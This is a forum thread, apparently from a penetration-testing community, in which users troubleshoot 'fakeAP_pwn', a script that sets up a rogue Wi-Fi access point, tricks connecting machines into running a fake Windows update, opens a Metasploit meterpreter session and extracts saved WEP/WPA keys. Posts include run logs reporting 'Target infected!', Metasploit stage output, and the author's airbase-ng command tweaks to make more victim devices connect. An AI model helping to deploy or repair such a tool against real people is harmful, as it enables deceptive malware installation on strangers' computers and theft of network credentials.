[Script] [Video] FakeAP_pwn (v0.2.1)

[g0tmi1k]

About Revision 81

Hi guys I have been following the thread for about a month.
last night I give it a try to the latest Revision 81, not having any luck with the previous version - so far to report -

On the DHCP window:

'DHCPREQUEST ON 10.0.0.150 FROM 00:17:9A:BD:f7:bf (cesar) via at0
Unable to add forward map from cesar.Home.com to 10.0.0.150: timed out"

I can ping from my the other Laptop to 10.0.0.1
32 bytes 2ms
running XP SP3 - Disable: AV and firewalls

I also try from the XP Laptop:

hxxx://10.0.0.1/Windows-KB183905-x86-ENU.exe
hxxx://update.microsoft.com/Windows-KB183905-x86-ENU.exe

Without any success - no internet in Laptop running XP

Attach the output file

Thanks

Thanks for the information (and posting it!)
I've been away for a while and I've seen that Joker has been working on a fix for you - update to the latest version, give it a try, and could you reply with how you got on?

[airwolf3000]

Hi

I am still having the same problem, no Internet at the target laptop.

Quick question.
Could this be the reason why the target does not get Internet:

My BT4 shows when asked:

#root@bt:~# hostapd --help
#The program 'hostapd' is currently not installed. You can install it by typing:
#apt-get install hostapd
#bash: hostapd: command not found


lines 477-501 --> should ask = if not install would you like to install it?
But, it did not shows any message, nor does it shows in the output file, as I have run several version - 78, 81 and 83- rev. files.

line 477 and 1247 at the very beginning shows = elif - it may be suppose to be = if - only?
line 1121 reads = if - but 477 and 1247 are different, not executing part of the script.

I am new at this type of scripts, so it could be my short experience

Thanks

[pentest09]

Hi all just a quickie regarding this script.

It does work ! fake ap pwn beta 78 i have running on vmware via win 7 64 bit.
here the output of the script when complete.

root@bt:~# cd '/root/fakeAP_pwn'
root@bt:~/fakeAP_pwn# ls
fakeAP_pwn.log fap78.sh trunk www
root@bt:~/fakeAP_pwn# sh fap78.sh[*] fakeAP_pwn v0.3 (Beta-#78)
[>] Checking environment...
[>] Setting up wireless card...
[>] Creating: Scripts
[>] Creating: Exploit (Windows)
[>] Starting: Fake access point
[>] Configuring environment...
[>] Starting: DHCP
[>] Starting: DNS
[>] Starting: Metasploit
[>] Starting: Web server
[i] Waiting for target to run the "update"
[i] Target infected!
[>] Giving internet access...
iptables: No chain/target/match by that name
[>] Opening WiFi Keys...
[-] Error running command. Error code: 3
fap78.sh: line 1438: syntax error: unexpected end of file (doesnt seem to affect anything)
root@bt:~/fakeAP_pwn#

gives meterpreter session and extracts wep wpa keys to /tmp/fakeAP_pwn.wkv

dns works have had it working fine on previous early pre multi encoded payloads but up to beta 78 doenst work on dns or internet.

Hope this helps. r80 doesnt work with internet or dns so far

doesnt give internet after, an d in case ur baffled fap.sh is just renamed so i know wot one it is as i have loads of rev.


keep it up lads.

[g0tmi1k]

Hi

I am still having the same problem, no Internet at the target laptop.

Quick question.
Could this be the reason why the target does not get Internet:

My BT4 shows when asked:

#root@bt:~# hostapd --help
#The program 'hostapd' is currently not installed. You can install it by typing:
#apt-get install hostapd
#bash: hostapd: command not found


lines 477-501 --> should ask = if not install would you like to install it?
But, it did not shows any message, nor does it shows in the output file, as I have run several version - 78, 81 and 83- rev. files.

line 477 and 1247 at the very beginning shows = elif - it may be suppose to be = if - only?
line 1121 reads = if - but 477 and 1247 are different, not executing part of the script.

I am new at this type of scripts, so it could be my short experience

Thanks

By default it doesnt use hostapd (uses airbase-ng) and the script is coded not to check it, if its not used.
I think I messed on a release, with a if/elfi bit. Should be fix now (in the newest version - 87).
Alot of work/changed alot of stuff about in 87. Update to the latest version - see if you still have errors/questions about the script.

Hi all just a quickie regarding this script.

It does work ! fake ap pwn beta 78 i have running on vmware via win 7 64 bit.
here the output of the script when complete.

root@bt:~# cd '/root/fakeAP_pwn'
root@bt:~/fakeAP_pwn# ls
fakeAP_pwn.log fap78.sh trunk www
root@bt:~/fakeAP_pwn# sh fap78.sh[*] fakeAP_pwn v0.3 (Beta-#78)
[>] Checking environment...
[>] Setting up wireless card...
[>] Creating: Scripts
[>] Creating: Exploit (Windows)
[>] Starting: Fake access point
[>] Configuring environment...
[>] Starting: DHCP
[>] Starting: DNS
[>] Starting: Metasploit
[>] Starting: Web server
[i] Waiting for target to run the "update"
[i] Target infected!
[>] Giving internet access...
iptables: No chain/target/match by that name
[>] Opening WiFi Keys...
[-] Error running command. Error code: 3
fap78.sh: line 1438: syntax error: unexpected end of file (doesnt seem to affect anything)
root@bt:~/fakeAP_pwn#

gives meterpreter session and extracts wep wpa keys to /tmp/fakeAP_pwn.wkv

dns works have had it working fine on previous early pre multi encoded payloads but up to beta 78 doenst work on dns or internet.

Hope this helps. r80 doesnt work with internet or dns so far

doesnt give internet after, an d in case ur baffled fap.sh is just renamed so i know wot one it is as i have loads of rev.


keep it up lads.

Glad to know it work for someone else!
Ouch. I see a few coding errors in the output window though.
Could you try the latest version - see if you still get those error messages?

About not having internet access afterwards - what mode do you have it in? normal/transparent/non?
If you use -v, it *should* tell you. (=
*It could be because the default value got changed at some stage*

[parrotface]

hi
not tried your script for about 10 days as I was having trouble trying to connect.
Clean start - Just installed BT4r1 onto new sdhc card and installed your #87 script
Default changed to SBD other wise run as downloaded.
XP sp2 box now connects No problem - downloads and runs windowsKB exe and then hangs up.
fakeAP shows Waiting for target to run the "update"
Command: watch -d -n 1 "arp -n -v -i at0"

Vista box connects but won't download the exe

Tried hostapd this displays the message - Hostapd failed to start - is there some config that needs setting up?

hope I can get it to run again soon Many thanks

[g0tmi1k]

Newest version.

fakeAP_pwn-v0.3~Beta88.tar.gz
*OUT OF DATE*

[g0tmi1k]

hi
not tried your script for about 10 days as I was having trouble trying to connect.
Clean start - Just installed BT4r1 onto new sdhc card and installed your #87 script
Default changed to SBD other wise run as downloaded.
XP sp2 box now connects No problem - downloads and runs windowsKB exe and then hangs up.
fakeAP shows Waiting for target to run the "update"
Command: watch -d -n 1 "arp -n -v -i at0"

Vista box connects but won't download the exe

Tried hostapd this displays the message - Hostapd failed to start - is there some config that needs setting up?

hope I can get it to run again soon Many thanks

Ive just push a new update out. Give that a try.
Hostapd - I haven't got working yet - due to my laptop being repaired, so I cant yet help you with that. Joker knows more that I do about that stuff!
On your vista box, can you get to http://10.0.0.1?
does http://10.0.0.1/KB183905-x86-ENU.exe work?

[parrotface]

just tried beta88 as downloaded
XP sp2 box connects No problem
run the download and metersploit window shows -- sending stage to 10.0.0.151
main script window shows "waiting for target to run update file "

changed default to "sbd" now the metasploit window shows
Session ID 1 (10.0.0.1:4564 -> 10.0.0.151:3386) processing AutoRunScript '/tmp/fakeAP_pwn.rb'
SBD window stays blank

Vista Box won't connect to Free-Wifi -- max signal strength showing -- moved to another room to reduce signal strength, still won't connect.
PDA won't connect either
Any Ideas many thanks

[g0tmi1k]

just tried beta88 as downloaded
XP sp2 box connects No problem
run the download and metersploit window shows -- sending stage to 10.0.0.151
main script window shows "waiting for target to run update file "

changed default to "sbd" now the metasploit window shows
Session ID 1 (10.0.0.1:4564 -> 10.0.0.151:3386) processing AutoRunScript '/tmp/fakeAP_pwn.rb'
SBD window stays blank

Vista Box won't connect to Free-Wifi -- max signal strength showing -- moved to another room to reduce signal strength, still won't connect.
PDA won't connect either
Any Ideas many thanks

Okay, so its the metasploit stage thats failing...
Ill give it a try later.




With the Vista/PDA, if you edit line 1333

Code:

command="airbase-ng -a $macAddress -W 0 -c $fakeAPchannel -e \"$ESSID\""

Could you replace it with either:

Code:

command="airbase-ng -a $macAddress -c $fakeAPchannel -e \"$ESSID\""

(so -W is removed)

Code:

command="airbase-ng -W 0 -c $fakeAPchannel -e \"$ESSID\""

(so -a is removed)

Code:

command="airbase-ng -c $fakeAPchannel -e \"$ESSID\""

(so -a & -w is removed)

[g0tmi1k]

Okay, so its the metasploit stage thats failing...
Ill give it a try later.

Think Ive fix it (R90) - give it a try now.
Ive tested the metasploit script .rb, not the iptables or anything.